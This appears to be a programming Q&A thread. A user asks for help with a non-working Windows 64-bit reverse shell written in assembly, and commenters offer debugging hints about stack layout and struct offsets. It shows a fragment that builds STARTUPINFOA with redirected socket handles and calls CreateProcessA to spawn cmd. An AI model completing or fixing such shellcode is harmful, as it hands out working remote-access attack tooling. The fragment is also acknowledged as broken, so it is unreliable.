0

hello i am writing windows 64bit reverse shell in assembly and after gett connected to the targetmachine ip, i want to create process to spwan a shell, fistly i try to write startinfo struct for createprocess api, but after then i pass all the parameters to the function but it doesn't work, and here is full code https://pastebin.com/6Ft2jCMX

;STARTUPINFOA+PROCESS_INFORMATION
;----------------------------------
push byte 0x12                  ; We want to place (18 * 4) = 72 null bytes onto the stack
    pop rcx                         ; Set ECX for the loop
    xor r11,r11
push_loop:

    push   r11                      ; push a null dword
    loop push_loop                  ; keep looping untill we have pushed enough nulls
lea r12,[rsp]
  
mov dl,104
  
xor rcx,rcx
mov [r12],dword edx
mov [r12+4],rcx
mov [r12+12],rcx
mov [r12+20],rcx
mov [r12+24],rcx
  
xor rdx,rdx
mov dl,255
inc rdx
  
mov [r12+0x3c],edx
mov [r12+0x50],r14 ;  HANDLE hStdInput;
mov [r12+0x58],r14 ;  HANDLE hStdOutput;
mov [r12+0x60],r14  ;HANDLE hStdError;


;createprocessA_calling
sub rsp, 0x70

push 'cmdA'
mov [rsp+3],byte dl
  
lea rdx,[rsp]
inc rcx
mov [rsp+32],rcx
xor rcx,rcx
  
xor r8,r8
  
mov [rsp+40],r8
mov [rsp+48],r8
mov [rsp+56],r8
lea r9,[r12]
mov [rsp+64],r9
lea r9,[r12+104]
mov [rsp+72],r9
  
xor r9,r9
  
call rbx ;createprocessA

so at last when i call the createprocessA it got stuck

nevernever69
  • 1
  • 3
  • 1
    Run this through a debugger. Check if `rbx`(the function), `rdx`, `rcx`, `r8`, `r9`, `[rsp + 32]`, ... (the arguments) all contain the correct values you intend at the moment of `call rbx` (`CreateProcessA`). There are 2 cases. 1. Most likely some value will be off, so fix that. 2. All values are what you intended, but the program still runs wrong. If so, write a C program that calls `CreateProcessA` with your intended arguments, and ask a question here why and how it doesn't work. – xiver77 Jun 24 '22 at 08:37
  • hello, xiver77, i am writing and testing with xdbg everytime but the main problem is to setup startinfo struct, and if you have ever written 64bit reverse shell assembly, so how you implement createprocessa function and setup struct startupinfo it – nevernever69 Jun 24 '22 at 09:20
  • Did you account for the homing space? I didn't track every stack location carefully but isn't the program name right at the TOS when `CreateProcessA` is called? – Margaret Bloom Jun 24 '22 at 09:52
  • @nevernever69 I'm asking you to show some effort to correctly identify the problem. Read MSDN if you don't know how to set up `STARTUPINFOA`. The Windows internals are quite kindly documented. – xiver77 Jun 24 '22 at 10:08
  • @MargaretBloom when i call the function. all the parameters are correct other than struct startinfoa, and processinfo, because when i try to setup them on different location on stack,and call them when function was call they are not at the given position – nevernever69 Jun 24 '22 at 11:53
  • That was not my point. If you are sure it's not a homing space problem, please ignore my pointer. If you don't know what the homing space is, it's definitively worth checking. – Margaret Bloom Jun 24 '22 at 14:36
  • @MargaretBloom, as your concerned about homing space, i thaught may be homing space is not the cause of failure may be the failure is due to implement in createprocess function last param(structinfo, processinfo), if you don't mind try implementing the function and try fixing it i have tried different many diiferent technique to resolve but got failure – nevernever69 Jun 24 '22 at 16:54
  • Yes, your structures are wrong. But that's only **one** of the issues. You'll see. Find the right offsets by counting with alignment [or asking a compiler](https://godbolt.org/z/EG3Wsed9K). – Margaret Bloom Jun 24 '22 at 18:04

0 Answers0